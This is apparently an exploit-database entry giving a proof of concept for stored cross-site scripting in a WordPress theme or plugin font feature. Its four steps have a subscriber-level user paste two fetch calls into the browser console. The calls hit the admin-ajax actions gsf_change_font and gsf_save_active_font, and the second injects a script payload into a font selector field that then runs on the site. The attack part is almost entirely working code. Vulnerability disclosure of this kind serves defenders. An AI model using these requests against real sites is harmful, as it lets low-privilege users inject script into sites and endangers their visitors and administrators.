Share
## https://sploitus.com/exploit?id=WPEX-ID:DF12513B-9664-45BE-8824-2924BFDDF364
1. Login with a subscriber account, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. Paste the following in your browser's console:
```
fetch("/wp-admin/admin-ajax.php?action=gsf_change_font", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_nonce=${GSF_META_DATA['nonce']}&font_data[kind]=custom&font_data[selector]=ppppp`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})
```
3. And then the following:
```
fetch("/wp-admin/admin-ajax.php?action=gsf_save_active_font", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_nonce=${GSF_META_DATA['nonce']}&font[0][kind]=custom&font[0][selector]=");alert(1);//`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})
```
4. Visit the site to witness our malicious script running, triggering an alert box.